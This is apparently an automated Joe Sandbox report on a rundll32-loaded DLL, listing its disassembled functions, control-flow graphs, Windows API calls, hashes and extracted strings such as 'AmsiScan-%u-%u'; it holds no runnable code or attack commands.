                                                                                                                      • Associated: 00000006.00000002.1818251018.0000000180038000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000006.00000002.1818268281.000000018003B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_6_2_180000000_rundll32.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: _invalid_parameter_noinfo
                                                                                                                      • String ID:
                                                                                                                      • API String ID: 3215553584-0
                                                                                                                      • Opcode ID: 76e772688924292ddc527cdee5a1c178fbb710bea3d58e257d819c99dcd316d4
                                                                                                                      • Instruction ID: 65d17c79e222b1a2ddf372d1d78ee9c6fe23a33d1381d1b4cca3fedefeeea444
                                                                                                                      • Opcode Fuzzy Hash: 76e772688924292ddc527cdee5a1c178fbb710bea3d58e257d819c99dcd316d4
                                                                                                                      • Instruction Fuzzy Hash: 2F119E32119B4C86F382AB14E4403D9B3A4F7987C0F058426F6554B792DF38DA18CB40
                                                                                                                      Function 0000000180018D1C Relevance: 1.5, APIs: 1, Instructions: 36memoryCOMMONLIBRARYCODE
                                                                                                                      Download Yara Rule

                                                                                                                      Control-flow Graph

                                                                                                                      • Executed
                                                                                                                      • Not Executed
                                                                                                                      control_flow_graph 138 180018d1c-180018d2b 139 180018d3b-180018d4b 138->139 140 180018d2d-180018d39 138->140 142 180018d62-180018d7a RtlAllocateHeap 139->142 140->139 141 180018d7e-180018d89 call 180011c1c 140->141 146 180018d8b-180018d90 141->146 143 180018d7c 142->143 144 180018d4d-180018d54 call 18001b8dc 142->144 143->146 144->141 150 180018d56-180018d60 call 180014998 144->150 150->141 150->142
                                                                                                                      APIs
                                                                                                                      • RtlAllocateHeap.NTDLL(?,?,00000000,0000000180016B55,?,?,0000EABB3B49FBAC,0000000180011C25,?,?,?,?,0000000180016D36,?,?,00000000), ref: 0000000180018D71
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000006.00000002.1818190772.0000000180001000.00000020.00000001.01000000.00000003.sdmp, Offset: 0000000180000000, based on PE: true
                                                                                                                      • Associated: 00000006.00000002.1818173972.0000000180000000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000006.00000002.1818215693.0000000180025000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000006.00000002.1818251018.0000000180038000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000006.00000002.1818268281.000000018003B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_6_2_180000000_rundll32.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: AllocateHeap
                                                                                                                      • String ID:
                                                                                                                      • API String ID: 1279760036-0
                                                                                                                      • Opcode ID: da620ac3b0470c3e284df06d5e3f72be40a4f5f84ded953bc3c8e14b1fd962ce
                                                                                                                      • Instruction ID: f62841dba19585218a950150cd799660ed1f7947fd5cd83960c79d349b7bd01d
                                                                                                                      • Opcode Fuzzy Hash: da620ac3b0470c3e284df06d5e3f72be40a4f5f84ded953bc3c8e14b1fd962ce
                                                                                                                      • Instruction Fuzzy Hash: DDF01774301F0C85FFEB57A6A8513E523946FADBC4F4CD424A90A8A6D2EE2CC7899310

                                                                                                                      Non-executed Functions

                                                                                                                      Function 000000018000B992 Relevance: 45.9, APIs: 19, Strings: 7, Instructions: 387registryCOMMON
                                                                                                                      Download Yara Rule

                                                                                                                      Control-flow Graph

                                                                                                                      • Executed
                                                                                                                      • Not Executed
                                                                                                                      control_flow_graph 198 18000b992-18000b9a5 RegQueryInfoKeyW 199 18000b9b5-18000b9bc 198->199 200 18000b9a7-18000b9b0 RegCloseKey 198->200 201 18000b9d1-18000b9e8 call 180014728 199->201 202 18000b9be-18000b9c1 199->202 200->199 207 18000b9ea-18000b9ed 201->207 208 18000ba0e-18000ba25 call 1800146a8 201->208 202->201 203 18000b9c3-18000b9cc call 180005590 202->203 203->201 210 18000b9f3-18000b9f6 207->210 211 18000bb6e-18000bb78 call 180005370 207->211 217 18000ba27-18000ba2a 208->217 218 18000ba4b-18000ba62 call 1800146a8 208->218 214 18000bb84-18000bbcb call 180005370 call 18000b4f0 210->214 215 18000b9fc-18000b9ff 210->215 221 18000bb79-18000bb83 call 180005370 211->221 235 18000bbd1-18000bbfb 214->235 236 18000bd37-18000bd3f 214->236 215->214 220 18000ba05-18000ba08 215->220 217->211 222 18000ba30-18000ba33 217->222 231 18000ba64-18000ba67 218->231 232 18000ba88-18000baaa call 180005ac0 218->232 220->208 220->221 221->214 222->214 226 18000ba39-18000ba3c 222->226 226->214 230 18000ba42-18000ba45 226->230 230->218 230->221 231->211 234 18000ba6d-18000ba70 231->234 242 18000bb15-18000bb18 232->242 243 18000baac-18000baef RegQueryInfoKeyW 232->243 234->214 241 18000ba76-18000ba79 234->241 252 18000bc01-18000bc09 235->252 253 18000bce4-18000bceb 235->253 239 18000bd41 236->239 240 18000bd47-18000bd6d SysFreeString call 18000da80 236->240 239->240 241->214 245 18000ba7f-18000ba82 241->245 249 18000bb23-18000bb3d RegCloseKey 242->249 250 18000bb1a-18000bb1d RegCloseKey 242->250 247 18000baf1-18000bafa RegCloseKey 243->247 248 18000bafd-18000bb00 243->248 245->221 245->232 247->248 248->242 256 18000bb02-18000bb05 248->256 263 18000bb45-18000bb6d call 18000da80 249->263 264 18000bb3f 249->264 250->249 252->253 258 18000bc0f-18000bc2e SysStringLen call 180011cf8 252->258 254 18000bd14 253->254 255 18000bced-18000bcfd GetModuleHandleW 253->255 261 18000bd1b-18000bd31 SysFreeString 254->261 255->254 260 18000bcff-18000bd12 GetProcAddress 255->260 256->242 262 18000bb07-18000bb10 call 180005590 256->262 268 18000bc54-18000bc73 258->268 269 18000bc30-18000bc33 258->269 260->254 260->261 261->236 262->242 264->263 274 18000bc75-18000bc7d 268->274 275 18000bcb6-18000bcd4 268->275 272 18000bc39-18000bc3c 269->272 273 18000bd6e-18000bd78 call 180005370 269->273 276 18000bc42-18000bc45 272->276 277 18000bd8a-18000bde2 call 180005370 GetThreadLocale SetThreadLocale 272->277 280 18000bd79-18000bd7e call 18000d740 273->280 278 18000bc87-18000bc9b CharNextW 274->278 275->280 281 18000bcda-18000bcdf 275->281 276->277 283 18000bc4b-18000bc4e 276->283 294 18000bde4-18000bdea 277->294 295 18000bdf0-18000be13 277->295 285 18000bca6-18000bcac 278->285 286 18000bc9d-18000bca1 278->286 289 18000bd7f-18000bd89 call 180005370 280->289 281->253 283->268 283->289 285->278 292 18000bcae 285->292 286->285 291 18000bca3 286->291 289->277 291->285 292->275 294->295 306 18000bf40-18000bf4a 294->306 297 18000be15-18000be1b 295->297 298 18000be5f-18000be61 295->298 302 18000be1d-18000be32 call 18000b730 297->302 303 18000be4e-18000be55 297->303 299 18000be67-18000be95 call 18000b4f0 298->299 300 18000bf30-18000bf38 298->300 312 18000bf15-18000bf1d 299->312 313 18000be97-18000beab 299->313 300->306 302->300 321 18000be38-18000be41 302->321 303->297 304 18000be57-18000be59 303->304 304->298 304->300 308 18000bf87-18000bfad SetThreadLocale call 18000da80 306->308 309 18000bf4c-18000bf85 call 1800076b0 306->309 309->308 318 18000bf25-18000bf2a SysFreeString 312->318 319 18000bf1f 312->319 313->312 323 18000bead-18000beb4 313->323 318->300 319->318 321->300 329 18000be47 321->329 324 18000beb6-18000bec6 GetModuleHandleW 323->324 325 18000bee0 323->325 324->325 327 18000bec8-18000bede GetProcAddress 324->327 328 18000bee7-18000bf0f UnRegisterTypeLib 325->328 327->325 327->328 328->312 329->303
                                                                                                                      APIs
                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000006.00000002.1818190772.0000000180001000.00000020.00000001.01000000.00000003.sdmp, Offset: 0000000180000000, based on PE: true
                                                                                                                      • Associated: 00000006.00000002.1818173972.0000000180000000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000006.00000002.1818215693.0000000180025000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000006.00000002.1818251018.0000000180038000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000006.00000002.1818268281.000000018003B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_6_2_180000000_rundll32.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: Close$InfoQuery
                                                                                                                      • String ID: APPID$CLSID\$OLEAUT32.DLL$RegisterTypeLibForUser$UnRegisterTypeLibForUser$\Implemented Categories${636e6d27-fcd4-4f50-9327-a57314f1dd57}
                                                                                                                      • API String ID: 852846383-4188877753
                                                                                                                      • Opcode ID: fbace4b01e39f4c152dc32fcbca2de49086262a6c9a615992fa1c11e5009fb91
                                                                                                                      • Instruction ID: 36fdccbf38cee0f485eeab3dfea302ae432b8954be7fefccb6c683304f628cc1
                                                                                                                      • Opcode Fuzzy Hash: fbace4b01e39f4c152dc32fcbca2de49086262a6c9a615992fa1c11e5009fb91
                                                                                                                      • Instruction Fuzzy Hash: 8FF17331705B4982EBA6DB65E4943EA73A1F78CBD4F548016FA8983B59DF78C64CCB00
                                                                                                                      Function 000000018001C45C Relevance: 24.0, APIs: 9, Strings: 4, Instructions: 1208COMMON
                                                                                                                      Download Yara Rule
                                                                                                                      APIs
                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000006.00000002.1818190772.0000000180001000.00000020.00000001.01000000.00000003.sdmp, Offset: 0000000180000000, based on PE: true
                                                                                                                      • Associated: 00000006.00000002.1818173972.0000000180000000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000006.00000002.1818215693.0000000180025000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000006.00000002.1818251018.0000000180038000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000006.00000002.1818268281.000000018003B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_6_2_180000000_rundll32.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: _invalid_parameter_noinfo$memcpy_s$fegetenv
                                                                                                                      • String ID: 1#IND$1#INF$1#QNAN$1#SNAN
                                                                                                                      • API String ID: 808467561-2761157908
                                                                                                                      • Opcode ID: 8c05d314b1a74ba9b1eb68ae04c90fd85cbb0cde2249671c6c6cb671a958a776
                                                                                                                      • Instruction ID: e1f0dae4446f51bdafb8847fc3cb24afbbfbf491ddeddb96ede54685b1ef348e
                                                                                                                      • Opcode Fuzzy Hash: 8c05d314b1a74ba9b1eb68ae04c90fd85cbb0cde2249671c6c6cb671a958a776
                                                                                                                      • Instruction Fuzzy Hash: 79B2F472614A998BE7BACE69D440BED37A1F38C7C8F509116EA0657B84DF34CB48CB05
                                                                                                                      Function 000000018000C480 Relevance: 23.1, APIs: 12, Strings: 1, Instructions: 358threadCOMMON
                                                                                                                      Download Yara Rule

                                                                                                                      Control-flow Graph

                                                                                                                      • Executed
                                                                                                                      • Not Executed
                                                                                                                      control_flow_graph 782 18000c480-18000c4e3 call 18000da10 785 18000c4e5-18000c4ea 782->785 786 18000c4ef-18000c515 782->786 787 18000c9a9-18000c9d8 call 18000da80 785->787 790 18000c998 786->790 791 18000c51b-18000c522 786->791 793 18000c99c-18000c99f 790->793 791->793 794 18000c528-18000c54f call 18000f790 GetCurrentProcessId GetCurrentThreadId 791->794 795 18000c9a1 793->795 796 18000c9a7 793->796 799 18000c550-18000c575 794->799 795->796 796->787 801 18000c986-18000c98b 799->801 802 18000c57b 799->802 801->790 803 18000c98d-18000c993 801->803 804 18000c580-18000c597 802->804 803->799 805 18000c918-18000c928 CoTaskMemFree 804->805 806 18000c59d-18000c5c6 804->806 805->801 807 18000c92a 805->807 809 18000c909-18000c910 806->809 810 18000c5cc-18000c697 call 1800085d0 call 18000acb0 call 18000d630 call 18000acb0 806->810 807->804 809->805 812 18000c912 809->812 820 18000c699-18000c6a6 call 1800085d0 810->820 821 18000c6ab-18000c6b2 810->821 812->805 820->821 823 18000c6b4-18000c6bc call 18000d628 821->823 824 18000c6bd-18000c6c6 821->824 823->824 825 18000c6c8-18000c6df 824->825 826 18000c6ff-18000c742 CreateFileMappingW 824->826 828 18000c6e1-18000c6f4 825->828 829 18000c6fa call 18000d628 825->829 830 18000c748-18000c768 MapViewOfFile 826->830 831 18000c8bb-18000c8c5 826->831 828->829 833 18000c9df-18000c9e4 call 180011aec 828->833 829->826 835 18000c76e-18000c78a 830->835 836 18000c8b0-18000c8b9 CloseHandle 830->836 837 18000c8c7-18000c8cb 831->837 838 18000c92f-18000c933 831->838 856 18000c9e5-18000c9ea call 180011aec 833->856 852 18000c8a7-18000c8aa UnmapViewOfFile 835->852 853 18000c790-18000c81d call 1800085d0 * 2 call 18000ca00 835->853 836->831 842 18000c903-18000c905 837->842 843 18000c8cd-18000c8e3 837->843 839 18000c935-18000c94b 838->839 840 18000c967-18000c97e 838->840 845 18000c962 call 18000d628 839->845 846 18000c94d-18000c960 839->846 840->801 847 18000c980 840->847 842->809 849 18000c8e5-18000c8f8 843->849 850 18000c8fe call 18000d628 843->850 845->840 846->845 854 18000c9d9-18000c9de call 180011aec 846->854 847->801 849->850 857 18000c9f1-18000c9f6 call 180011aec 849->857 850->842 852->836 873 18000c856-18000c86f 853->873 874 18000c81f-18000c836 853->874 854->833 866 18000c9eb-18000c9f0 call 180011aec 856->866 866->857 873->852 877 18000c871-18000c887 873->877 875 18000c851 call 18000d628 874->875 876 18000c838-18000c84b 874->876 875->873 876->856 876->875 879 18000c8a2 call 18000d628 877->879 880 18000c889-18000c89c 877->880 879->852 880->866 880->879
                                                                                                                      APIs
                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000006.00000002.1818190772.0000000180001000.00000020.00000001.01000000.00000003.sdmp, Offset: 0000000180000000, based on PE: true
                                                                                                                      • Associated: 00000006.00000002.1818173972.0000000180000000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000006.00000002.1818215693.0000000180025000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000006.00000002.1818251018.0000000180038000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000006.00000002.1818268281.000000018003B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_6_2_180000000_rundll32.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: Current$ProcessThread
                                                                                                                      • String ID: OfficeScan-%u-%u
                                                                                                                      • API String ID: 2063062207-1227074125
                                                                                                                      • Opcode ID: c6addf902dd7764679405b11add7e8d10a0e2cc93030d68895b140be5f5e4abf
                                                                                                                      • Instruction ID: bc3edd4260d23f08e391710098e1a743541aac0b446be91329466539f08d82ed
                                                                                                                      • Opcode Fuzzy Hash: c6addf902dd7764679405b11add7e8d10a0e2cc93030d68895b140be5f5e4abf
                                                                                                                      • Instruction Fuzzy Hash: A2E18B72710B988AEB51CB69E8447DD73A1FB88BD8F508216EA5D53B98DF78C648C700
                                                                                                                      Function 0000000180001950 Relevance: 17.8, APIs: 9, Strings: 1, Instructions: 262filethreadCOMMON
                                                                                                                      Download Yara Rule

                                                                                                                      Control-flow Graph

                                                                                                                      • Executed
                                                                                                                      • Not Executed
                                                                                                                      control_flow_graph 1165 180001950-180001a17 call 180001d50 * 2 1172 180001a1d-180001a24 1165->1172 1173 180001cbf-180001cc6 1165->1173 1172->1173 1176 180001a2a-180001ae6 GetCurrentProcessId GetCurrentThreadId call 1800085d0 call 18000acb0 call 18000d630 call 18000acb0 1172->1176 1174 180001cc8-180001ccd call 18000d628 1173->1174 1175 180001cce-180001cd5 1173->1175 1174->1175 1178 180001cd7 call 18000d628 1175->1178 1179 180001cdc-180001d05 call 18000da80 1175->1179 1192 180001ae8-180001afa call 1800085d0 1176->1192 1193 180001afb-180001afe 1176->1193 1178->1179 1192->1193 1195 180001b09-180001b11 1193->1195 1196 180001b00-180001b08 call 18000d628 1193->1196 1199 180001b13-180001b29 1195->1199 1200 180001b49-180001b8b CreateFileMappingW 1195->1200 1196->1195 1204 180001b44 call 18000d628 1199->1204 1205 180001b2b-180001b3e 1199->1205 1201 180001b91-180001bb2 MapViewOfFile 1200->1201 1202 180001c82-180001c8a 1200->1202 1208 180001c78-180001c81 CloseHandle 1201->1208 1209 180001bb8-180001bee call 18000f320 1201->1209 1202->1173 1210 180001c8c-180001ca2 1202->1210 1204->1200 1205->1204 1206 180001d0c-180001d11 call 180011aec 1205->1206 1222 180001d12-180001d20 call 180011aec 1206->1222 1208->1202 1220 180001bf0-180001bf8 1209->1220 1212 180001ca4-180001cb7 1210->1212 1213 180001cb9-180001cbe call 18000d628 1210->1213 1212->1213 1216 180001d06-180001d0b call 180011aec 1212->1216 1213->1173 1216->1206 1220->1220 1224 180001bfa-180001c34 call 1800085d0 call 180001e60 1220->1224 1231 180001c36-180001c4c 1224->1231 1232 180001c6c-180001c75 UnmapViewOfFile 1224->1232 1233 180001c67 call 18000d628 1231->1233 1234 180001c4e-180001c61 1231->1234 1232->1208 1233->1232 1234->1222 1234->1233
                                                                                                                      APIs
                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000006.00000002.1818190772.0000000180001000.00000020.00000001.01000000.00000003.sdmp, Offset: 0000000180000000, based on PE: true
                                                                                                                      • Associated: 00000006.00000002.1818173972.0000000180000000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000006.00000002.1818215693.0000000180025000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000006.00000002.1818251018.0000000180038000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000006.00000002.1818268281.000000018003B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_6_2_180000000_rundll32.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: _invalid_parameter_noinfo_noreturn$File$CurrentView$CloseCreateHandleMappingProcessThreadUnmap
                                                                                                                      • String ID: AmsiScan-%u-%u
                                                                                                                      • API String ID: 339449336-3663814587
                                                                                                                      • Opcode ID: f86d666ce77a50f1f388e1c7177cd6cafd7afe46af75158c94abe476d195f29a
                                                                                                                      • Instruction ID: cad9272cedee84faff7dd6d60437af36dd1b30a9edb82eafe8aa5967f9bdee47
                                                                                                                      • Opcode Fuzzy Hash: f86d666ce77a50f1f388e1c7177cd6cafd7afe46af75158c94abe476d195f29a
                                                                                                                      • Instruction Fuzzy Hash: 6CB19C72B00B488AFB52DBB5D8407DD73B1BB487E9F408616AE5923B99DF38C248C344
                                                                                                                      Function 0000000180004C00 Relevance: 16.9, APIs: 11, Instructions: 377stringCOMMON
                                                                                                                      Download Yara Rule

                                                                                                                      Control-flow Graph

                                                                                                                      • Executed
                                                                                                                      • Not Executed
                                                                                                                      control_flow_graph 1236 180004c00-180004c65 call 18000da10 call 1800058e0 1241 180005194-1800051b6 call 18000da80 1236->1241 1242 180004c6b-180004c82 lstrcmpiW 1236->1242 1244 180004c84-180004c87 1242->1244 1245 180004c89-180004ca0 lstrcmpiW 1242->1245 1246 180004cf0-180004cfa 1244->1246 1247 180004ca2-180004ca7 1245->1247 1248 180004ca9-180004cc0 lstrcmpiW 1245->1248 1252 180004d19-180004d2b call 1800058e0 1246->1252 1253 180004cfc-180004d00 1246->1253 1247->1246 1250 180004cc2-180004cc5 1248->1250 1251 180004cc7-180004cde lstrcmpiW 1248->1251 1250->1246 1254 180004ce4-180004ce7 1251->1254 1255 18000518f 1251->1255 1252->1241 1261 180004d31-180004d34 1252->1261 1256 180004d02-180004d06 1253->1256 1257 180004d0e-180004d17 CharNextW 1253->1257 1254->1246 1255->1241 1256->1257 1259 180004d08-180004d0c 1256->1259 1257->1246 1259->1252 1259->1257 1262 18000512a-180005139 1261->1262 1263 180004d3a-180004d3d 1261->1263 1266 180005140-180005149 1262->1266 1264 180004d43-180004d46 1263->1264 1265 180004f5d-180004f6f 1263->1265 1267 180004d4c-180004d52 1264->1267 1268 180004f1d-180004f37 VarUI4FromStr 1264->1268 1270 180004f70-180004f78 1265->1270 1266->1266 1269 18000514b-18000515e 1266->1269 1271 180004d58-180004d6a 1267->1271 1272 180004eff 1267->1272 1268->1241 1274 180004f3d-180004f58 1268->1274 1273 180005164-18000517c RegSetValueExW 1269->1273 1270->1270 1275 180004f7a-180004f81 1270->1275 1276 180004d70-180004d78 1271->1276 1277 180004f02-180004f18 call 1800058e0 1272->1277 1278 18000517e-180005180 1273->1278 1274->1273 1279 180004f87-180004fc1 call 18000f790 1275->1279 1280 180005049-18000504e 1275->1280 1276->1276 1281 180004d7a-180004da2 call 18000f790 1276->1281 1277->1241 1278->1277 1283 180005186-18000518d call 180005360 1278->1283 1291 180004fc3-180004fcf 1279->1291 1292 180004ff8-180005000 1279->1292 1280->1241 1294 180004da4-180004db0 1281->1294 1295 180004dda-180004de2 1281->1295 1283->1241 1296 1800051c2-180005217 call 180005370 1291->1296 1297 180004fd5-180004fdc 1291->1297 1293 180005008-18000503a 1292->1293 1305 180005053-180005065 call 18000f790 1293->1305 1306 18000503c-180005044 call 180005700 1293->1306 1300 180004db6-180004dc1 1294->1300 1301 1800051b7-1800051c1 call 180005370 1294->1301 1303 180004dea-180004e10 1295->1303 1297->1292 1298 180004fde-180004ff6 call 180005220 1297->1298 1298->1293 1300->1295 1308 180004dc3-180004dd8 call 180005220 1300->1308 1301->1296 1316 180004e16-180004e27 1303->1316 1317 180004ed7 1303->1317 1326 180005067-18000506a 1305->1326 1327 1800050df-180005119 RegSetValueExW 1305->1327 1306->1280 1308->1303 1318 180004e29 1316->1318 1319 180004e6b-180004e7c 1316->1319 1322 180004edc-180004ee7 1317->1322 1323 180004e30-180004e40 CharNextW 1318->1323 1324 180004e83-180004e89 1319->1324 1325 180004e7e-180004e81 1319->1325 1322->1278 1328 180004eed-180004efa call 180005700 1322->1328 1330 180004e42-180004e46 1323->1330 1331 180004e5a-180004e5d 1323->1331 1333 180004e90 1324->1333 1325->1322 1334 180005071-180005093 1326->1334 1327->1278 1332 18000511b-180005128 call 180005700 1327->1332 1328->1278 1330->1331 1336 180004e48-180004e58 CharNextW 1330->1336 1337 180004e61-180004e69 1331->1337 1332->1278 1339 180004e93-180004e9c 1333->1339 1340 180005095-1800050a6 1334->1340 1341 1800050ba-1800050dd 1334->1341 1336->1337 1337->1319 1337->1323 1339->1339 1344 180004e9e-180004eab 1339->1344 1340->1341 1341->1327 1341->1334 1344->1333 1345 180004ead-180004ed5 RegSetValueExW 1344->1345 1345->1322
                                                                                                                      APIs
                                                                                                                        • Part of subcall function 00000001800058E0: CharNextW.USER32 ref: 0000000180005914
                                                                                                                        • Part of subcall function 00000001800058E0: CharNextW.USER32 ref: 000000018000594C
                                                                                                                        • Part of subcall function 00000001800058E0: CharNextW.USER32 ref: 000000018000596E
                                                                                                                        • Part of subcall function 00000001800058E0: CharNextW.USER32 ref: 0000000180005986
                                                                                                                        • Part of subcall function 00000001800058E0: CharNextW.USER32 ref: 0000000180005995
                                                                                                                        • Part of subcall function 00000001800058E0: CharNextW.USER32 ref: 0000000180005A05
                                                                                                                      • lstrcmpiW.KERNEL32(?,?,00000001,?,?,00000000,00000000,0000000180007281,?,?,?,00000001800065C0,?,00000000,00000000,00000001800067C4), ref: 0000000180004C7A
                                                                                                                      • lstrcmpiW.KERNEL32(?,?,00000001,?,?,00000000,00000000,0000000180007281,?,?,?,00000001800065C0,?,00000000,00000000,00000001800067C4), ref: 0000000180004C98
                                                                                                                      • CharNextW.USER32(?,?,00000001,?,?,00000000,00000000,0000000180007281,?,?,?,00000001800065C0,?,00000000,00000000,00000001800067C4), ref: 0000000180004D0E
                                                                                                                      • CharNextW.USER32 ref: 0000000180004E33
                                                                                                                      • CharNextW.USER32 ref: 0000000180004E4F
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000006.00000002.1818190772.0000000180001000.00000020.00000001.01000000.00000003.sdmp, Offset: 0000000180000000, based on PE: true
                                                                                                                      • Associated: 00000006.00000002.1818173972.0000000180000000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000006.00000002.1818215693.0000000180025000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000006.00000002.1818251018.0000000180038000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000006.00000002.1818268281.000000018003B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_6_2_180000000_rundll32.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: CharNext$lstrcmpi
                                                                                                                      • String ID:
                                                                                                                      • API String ID: 3586774192-0
                                                                                                                      • Opcode ID: 71c4c3b59187793c0ac5c0779b293300478a4f86ff031f17b4ac1dc5bd20a7ba
                                                                                                                      • Instruction ID: b43cafc7f3d77eeea5c5002e53b8c5657f30a84e0d4b18a0f8ec373f57851286
                                                                                                                      • Opcode Fuzzy Hash: 71c4c3b59187793c0ac5c0779b293300478a4f86ff031f17b4ac1dc5bd20a7ba
                                                                                                                      • Instruction Fuzzy Hash: 90E1917220868886EBB2CF15E4503EA77A1F78CBD5F94C121EA99876D5DF38C64DC704
                                                                                                                      Function 0000000180001650 Relevance: 13.7, APIs: 9, Instructions: 168nativeCOMMON
                                                                                                                      Download Yara Rule
                                                                                                                      APIs
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000006.00000002.1818190772.0000000180001000.00000020.00000001.01000000.00000003.sdmp, Offset: 0000000180000000, based on PE: true
                                                                                                                      • Associated: 00000006.00000002.1818173972.0000000180000000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000006.00000002.1818215693.0000000180025000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000006.00000002.1818251018.0000000180038000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000006.00000002.1818268281.000000018003B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_6_2_180000000_rundll32.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: Local$AllocCloseErrorFreePort$ConnectCreateInitLastReplyRequestSectionStatusStringUnicodeWait
                                                                                                                      • String ID:
                                                                                                                      • API String ID: 1580264094-0
                                                                                                                      • Opcode ID: 931ebf02e4467db49fc8b2c2b9832907ae0e77b5b799dd1407357c31cd3cb390
                                                                                                                      • Instruction ID: e866a237de2d12efbca159f2353c94c74ce47be49055a04e80e62e2632237061
                                                                                                                      • Opcode Fuzzy Hash: 931ebf02e4467db49fc8b2c2b9832907ae0e77b5b799dd1407357c31cd3cb390
                                                                                                                      • Instruction Fuzzy Hash: 55616B32202B4889EB96DF61E8503E933A4FB89FD5F58D525EE8E07785CF38C6598344
                                                                                                                      Function 000000018000B210 Relevance: 11.6, Strings: 9, Instructions: 383COMMON
                                                                                                                      Download Yara Rule
                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000006.00000002.1818190772.0000000180001000.00000020.00000001.01000000.00000003.sdmp, Offset: 0000000180000000, based on PE: true
                                                                                                                      • Associated: 00000006.00000002.1818173972.0000000180000000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000006.00000002.1818215693.0000000180025000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000006.00000002.1818251018.0000000180038000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000006.00000002.1818268281.000000018003B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_6_2_180000000_rundll32.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID:
                                                                                                                      • String ID: !y<z$9_>$$TJz5$_ftv$e$k$l3>2$mY<M$r
                                                                                                                      • API String ID: 0-2568991842
                                                                                                                      • Opcode ID: 5ffd56415c9b792a629ee29e43db2d1630973c4545be7d01359f86a4d909744e
                                                                                                                      • Instruction ID: 8778e38a3da5d31117615d5389a3cd498a76a02c2a39e0be9be25283be3d4af3
                                                                                                                      • Opcode Fuzzy Hash: 5ffd56415c9b792a629ee29e43db2d1630973c4545be7d01359f86a4d909744e
                                                                                                                      • Instruction Fuzzy Hash: D5E110327167888ADB55CF39E044BAD3BE1F749BC9F598029EE4D87B45DA38D609CB00
                                                                                                                      Function 00000001800118B8 Relevance: 9.1, APIs: 6, Instructions: 83COMMONLIBRARYCODE
                                                                                                                      Download Yara Rule
                                                                                                                      APIs
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000006.00000002.1818190772.0000000180001000.00000020.00000001.01000000.00000003.sdmp, Offset: 0000000180000000, based on PE: true
                                                                                                                      • Associated: 00000006.00000002.1818173972.0000000180000000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000006.00000002.1818215693.0000000180025000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000006.00000002.1818251018.0000000180038000.00000004.00000001.01000000.00000003.sdmpDownload File
